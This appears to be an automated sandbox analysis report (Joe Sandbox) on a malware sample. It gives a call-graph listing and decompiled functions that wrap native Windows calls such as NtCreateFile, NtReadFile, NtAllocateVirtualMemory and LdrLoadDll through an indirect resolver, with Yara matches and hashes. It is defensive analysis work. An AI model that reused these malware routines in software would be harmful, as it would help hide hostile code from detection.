41615->41607 41617->41615 41619 409cb1 41618->41619 41620 409cad 41618->41620 41621 409cca 41619->41621 41622 409cfc 41619->41622 41620->41130 41664 417f60 LdrLoadDll 41621->41664 41665 417f60 LdrLoadDll 41622->41665 41624 409d0d 41624->41130 41626 409cec 41626->41130 41628 40d210 3 API calls 41627->41628 41629 4133d6 41628->41629 41629->41132 41631 4079f9 41630->41631 41666 407720 41630->41666 41633 407720 19 API calls 41631->41633 41636 407a1d 41631->41636 41634 407a0a 41633->41634 41634->41636 41684 40d480 10 API calls 41634->41684 41636->41134 41638 4191f0 LdrLoadDll 41637->41638 41639 4187ac 41638->41639 41804 bafea0 LdrInitializeThunk 41639->41804 41640 40a782 41642 40d210 41640->41642 41643 40d22d 41642->41643 41805 418250 41643->41805 41646 40d275 41646->41138 41647 4182a0 2 API calls 41648 40d29e 41647->41648 41648->41138 41650 4182bc 41649->41650 41651 4191f0 LdrLoadDll 41649->41651 41811 bafc60 LdrInitializeThunk 41650->41811 41651->41650 41652 40a7e5 41652->41144 41652->41147 41655 4191f0 LdrLoadDll 41654->41655 41656 41830c 41655->41656 41812 bafc90 LdrInitializeThunk 41656->41812 41657 40a8b9 41657->41155 41660 4191f0 LdrLoadDll 41659->41660 41661 4180cc 41660->41661 41813 bb0078 LdrInitializeThunk 41661->41813 41662 40a90c 41662->41159 41664->41626 41665->41624 41667 406e30 4 API calls 41666->41667 41682 40773a 41666->41682 41667->41682 41668 4079c9 41668->41631 41669 4079bf 41670 4070f0 2 API calls 41669->41670 41670->41668 41673 418190 2 API calls 41673->41682 41675 418720 LdrLoadDll NtClose 41675->41682 41678 40a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 41678->41682 41681 4180b0 2 API calls 41681->41682 41682->41668 41682->41669 41682->41673 41682->41675 41682->41678 41682->41681 41685 417fa0 41682->41685 41689 407550 41682->41689 41701 40d360 LdrLoadDll NtClose 41682->41701 41702 418020 LdrLoadDll 41682->41702 41703 418050 LdrLoadDll 41682->41703 41704 4180e0 LdrLoadDll 41682->41704 41705 407320 41682->41705 41721 405ea0 LdrLoadDll 41682->41721 41684->41636 41686 417fb6 41685->41686 41687 4191f0 LdrLoadDll 41686->41687 41688 417fbc 41687->41688 41688->41682 41690 407566 41689->41690 41722 417b10 41690->41722 41692 40757f 41697 4076f1 41692->41697 41743 407130 41692->41743 41694 407665 41695 407320 11 API calls 41694->41695 41694->41697 41696 407693 41695->41696 41696->41697 41698 418190 2 API calls 41696->41698 41697->41682 41699 4076c8 41698->41699 41699->41697 41700 418790 2 API calls 41699->41700 41700->41697 41701->41682 41702->41682 41703->41682 41704->41682 41706 407349 41705->41706 41783 407290 41706->41783 41708 40735c 41710 418790 2 API calls 41708->41710 41711 4073e7 41708->41711 41712 4073e2 41708->41712 41791 40d3e0 41708->41791 41710->41708 41711->41682 41713 418720 2 API calls 41712->41713 41714 40741a 41713->41714 41714->41711 41715 417fa0 LdrLoadDll 41714->41715 41716 40747f 41715->41716 41716->41711 41795 417fe0 41716->41795 41718 4074e3 41718->41711 41719 413a60 8 API calls 41718->41719 41720 407538 41719->41720 41720->41682 41721->41682 41723 41a280 2 API calls 41722->41723 41724 417b27 41723->41724 41750 408170 41724->41750 41726 417b42 41727 417b80 41726->41727 41728 417b69 41726->41728 41731 41a030 2 API calls 41727->41731 41729 41a0b0 2 API calls 41728->41729 41730 417b76 41729->41730 41730->41692 41732 417bba 41731->41732 41733 41a030 2 API calls 41732->41733 41734 417bd3 41733->41734 41738 417e74 41734->41738 41756 41a070 41734->41756 41737 417e60 41739 41a0b0 2 API calls 41737->41739 41741 41a0b0 2 API calls 41738->41741 41740 417e6a 41739->41740 41740->41692 41742 417ec9 41741->41742 41742->41692 41744 40722f 41743->41744 41745 407145 41743->41745 41744->41694 41745->41744 41746 413a60 8 API calls 41745->41746 41747 4071b2 41746->41747 41748 41a0b0 2 API calls 41747->41748 41749 4071d9 41747->41749 41748->41749 41749->41694 41751 408195 41750->41751 41752 409b50 LdrLoadDll 41751->41752 41753 4081c8 41752->41753 41755 4081ed 41753->41755 41759 40b350 41753->41759 41755->41726 41777 418810 41756->41777 41760 40b37c 41759->41760 41761 418470 LdrLoadDll 41760->41761 41762 40b395 41761->41762 41763 40b39c 41762->41763 41770 4184b0 41762->41770 41763->41755 41767 40b3d7 41768 418720 2 API calls 41767->41768 41769 40b3fa 41768->41769 41769->41755 41771 4191f0 LdrLoadDll 41770->41771 41772 4184cc 41771->41772 41776 bafbb8 LdrInitializeThunk 41772->41776 41773 40b3bf 41773->41763 41775 418aa0 LdrLoadDll 41773->41775 41775->41767 41776->41773 41778 4191f0 LdrLoadDll 41777->41778 41779 41882c 41778->41779 41782 bb0048 LdrInitializeThunk 41779->41782 41780 417e59 41780->41737 41780->41738 41782->41780 41784 4072a8 41783->41784 41785 409b50 LdrLoadDll 41784->41785 41786 4072c3 41785->41786 41787 413e60 LdrLoadDll 41786->41787 41788 4072d3 41787->41788 41789 4072dc PostThreadMessageW 41788->41789 41790 4072f0 41788->41790 41789->41790 41790->41708 41792 40d3f3 41791->41792 41798 418120 41792->41798 41796 4191f0 LdrLoadDll 41795->41796 41797 417ffc 41796->41797 41797->41718 41799 41813c 41798->41799 41800 4191f0 LdrLoadDll 41798->41800 41803 bafd8c LdrInitializeThunk 41799->41803 41800->41799 41801 40d41e 41801->41708 41803->41801 41804->41640 41806 41826c 41805->41806 41807 4191f0 LdrLoadDll 41805->41807 41810 baffb4 LdrInitializeThunk 41806->41810 41807->41806 41808 40d26e 41808->41646 41808->41647 41810->41808 41811->41652 41812->41657 41813->41662 41814 40aa95 41815 40aa46 41814->41815 41816 40aa9a 41814->41816 41817 40aa69 41815->41817 41818 40aa49 41815->41818 41819 40aa52 41816->41819 41820 40aa9d 41816->41820 41824 4182f0 2 API calls 41817->41824 41823 418720 2 API calls 41818->41823 41822 40aa56 41819->41822 41829 418720 2 API calls 41819->41829 41831 41871a 41819->41831 41821 4182a0 2 API calls 41820->41821 41826 40aade 41821->41826 41823->41822 41825 40aa7b 41824->41825 41827 418720 2 API calls 41825->41827 41828 40aa85 41827->41828 41829->41822 41832 4191f0 LdrLoadDll 41831->41832 41833 41873c NtClose 41832->41833 41833->41822 41834 c6e751 41835 c6e76e 41834->41835 41837 c6e8aa 41835->41837 41842 bbe0c6 LdrInitializeThunk LdrInitializeThunk __raise_exc 41835->41842 41838 c6e79e 41841 c6e7a4 41838->41841 41843 baf900 LdrInitializeThunk 41838->41843 41841->41837 41844 bbe025 LdrInitializeThunk 41841->41844 41842->41838 41843->41841 41844->41837 41845 baf9f0 LdrInitializeThunk

                                                                            Executed Functions

                                                                            Function 00418642, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 418642-41864c 1 418615-418641 NtCreateFile 0->1 2 41864e-418699 call 4191f0 0->2
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: *9A
                                                                            • API String ID: 823142352-3318015640
                                                                            • Opcode ID: a902431928215715c73cc22ddcd2ca37c7a5c3bf83ed93c80a9a52187be31b74
                                                                            • Instruction ID: 7cd4801693cb99a4425d6adea110bb0ada610b278f95903872666adc5ed39432
                                                                            • Opcode Fuzzy Hash: a902431928215715c73cc22ddcd2ca37c7a5c3bf83ed93c80a9a52187be31b74
                                                                            • Instruction Fuzzy Hash: 5811CDB2204209AFCB18DF99DC94DEB7BADAF8C314F15864DBA5D93241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041869A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 7 41869a-4186e9 call 4191f0 NtReadFile
                                                                            C-Code - Quality: 21%
                                                                            			E0041869A(signed int* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _t18;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				 *__ebx =  !( *__ebx);
				asm("cmpsb");
				_t13 = _v4;
				_t30 = _v4 + 0xc48;
				E004191F0(_t28, _v4, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a32; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t30))(_v0, _a4, _a8, _a12, _a16, _a20, _a24, _a28,  *_t4, _t29, _t32, 0xec8b5520); // executed
				return _t18;
			}










                                                                            0x0041869b
                                                                            0x0041869d
                                                                            0x004186a3
                                                                            0x004186af
                                                                            0x004186b7
                                                                            0x004186bc
                                                                            0x004186e5
                                                                            0x004186e9

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: ae3c4f7991056f379bf24a6280c134c6b9f6e3a9711b9fcbe6756b7d9981eb8b
                                                                            • Instruction ID: 13298110a0846653f0ac1476c6a677bbddcf6e397e7a2774f66647860b2f683d
                                                                            • Opcode Fuzzy Hash: ae3c4f7991056f379bf24a6280c134c6b9f6e3a9711b9fcbe6756b7d9981eb8b
                                                                            • Instruction Fuzzy Hash: 30F092B6200108AFDB14DF89DD94EEB77AABF8C354F158249BA1DA7251D630E851CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 10 4186a0-4186b6 11 4186bc-4186e9 NtReadFile 10->11 12 4186b7 call 4191f0 10->12 12->11
                                                                            C-Code - Quality: 37%
                                                                            			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                                                            0x004186a3
                                                                            0x004186af
                                                                            0x004186b7
                                                                            0x004186bc
                                                                            0x004186e5
                                                                            0x004186e9

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 280 409b50-409b6c 281 409b74-409b79 280->281 282 409b6f call 41af80 280->282 283 409b7b-409b7e 281->283 284 409b7f-409b8d call 41b3a0 281->284 282->281 287 409b9d-409bae call 419730 284->287 288 409b8f-409b9a call 41b620 284->288 293 409bb0-409bc4 LdrLoadDll 287->293 294 409bc7-409bca 287->294 288->287 293->294
                                                                            C-Code - Quality: 100%
                                                                            			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                            0x00409b6c
                                                                            0x00409b6f
                                                                            0x00409b74
                                                                            0x00409b79
                                                                            0x00409b83
                                                                            0x00409b88
                                                                            0x00409b8b
                                                                            0x00409b8d
                                                                            0x00409b95
                                                                            0x00409b9a
                                                                            0x00409b9a
                                                                            0x00409ba1
                                                                            0x00409ba9
                                                                            0x00409bac
                                                                            0x00409bae
                                                                            0x00409bc2
                                                                            0x00000000
                                                                            0x00409bc4
                                                                            0x00409bca
                                                                            0x00409b7e
                                                                            0x00409b7e
                                                                            0x00409b7e

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004185EA, Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 295 4185ea-4185ed 296 418622-418641 NtCreateFile 295->296 297 4185ef-418621 call 4191f0 295->297 297->296
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 13406f17d3e1d205a5ec7466ae84575eb744e91f4cc922cf2fb3f671efbf0cf9
                                                                            • Instruction ID: 48c0b808d72aef0fc00c8bbe7dd7d51c6ea24f2334b6f99c7190edb1e7afade8
                                                                            • Opcode Fuzzy Hash: 13406f17d3e1d205a5ec7466ae84575eb744e91f4cc922cf2fb3f671efbf0cf9
                                                                            • Instruction Fuzzy Hash: DE01D6B6215108BBDB08CF98DC95DDB77A9EF8C744F018248FA0D97281C634E951CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 301 4185f0-418606 302 41860c-418641 NtCreateFile 301->302 303 418607 call 4191f0 301->303 303->302
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 306 4187ca-41880d call 4191f0 NtAllocateVirtualMemory
                                                                            C-Code - Quality: 64%
                                                                            			E004187CA(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("lodsb");
				asm("rol esp, 0xec");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E004191F0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                                            0x004187ca
                                                                            0x004187cb
                                                                            0x004187d3
                                                                            0x004187df
                                                                            0x004187e7
                                                                            0x00418809
                                                                            0x0041880d

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: bb82000e734e4a10ac5c614d03afeabe546e7b090f5e83a0c1c691b7d339b353
                                                                            • Instruction ID: a7e419cf381e6249e5190e58f0e2e2dc9be517df532fda4a197b6c04a362d784
                                                                            • Opcode Fuzzy Hash: bb82000e734e4a10ac5c614d03afeabe546e7b090f5e83a0c1c691b7d339b353
                                                                            • Instruction Fuzzy Hash: F3F01CB5210109ABDB14DF89DC81EE777ADBF88354F118649FE5997281C630E920CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 309 4187d0-4187e6 310 4187ec-41880d NtAllocateVirtualMemory 309->310 311 4187e7 call 4191f0 309->311 311->310
                                                                            C-Code - Quality: 100%
                                                                            			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                            0x004187df
                                                                            0x004187e7
                                                                            0x00418809
                                                                            0x0041880d

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041871A, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 82%
                                                                            			E0041871A(void* __eax, void* _a4) {
				intOrPtr _v0;
				long _t12;
				void* _t15;

				asm("std");
				_t9 = _v0;
				_t4 = _t9 + 0x10; // 0x300
				_t5 = _t9 + 0xc50; // 0x409773
				E004191F0(_t15, _v0, _t5,  *_t4, 0, 0x2c);
				_t12 = NtClose(_a4); // executed
				return _t12;
			}






                                                                            0x0041871b
                                                                            0x00418723
                                                                            0x00418726
                                                                            0x0041872f
                                                                            0x00418737
                                                                            0x00418745
                                                                            0x00418749

                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 0a030cf58b278bf01a37fba5adb696adc19655469465a61ba12c442a1649db8c
                                                                            • Instruction ID: e7c7b26b56aa3ef3894ac92963c2d3afbe7f2f49a178fa1cdb0e7ac7142d9514
                                                                            • Opcode Fuzzy Hash: 0a030cf58b278bf01a37fba5adb696adc19655469465a61ba12c442a1649db8c
                                                                            • Instruction Fuzzy Hash: 52E08C75200204ABDA20EF988C88ED7372AEF44250F004049B958AF242C230FA0087A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                            0x00418723
                                                                            0x00418726
                                                                            0x0041872f
                                                                            0x00418737
                                                                            0x00418745
                                                                            0x00418749

                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                            • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
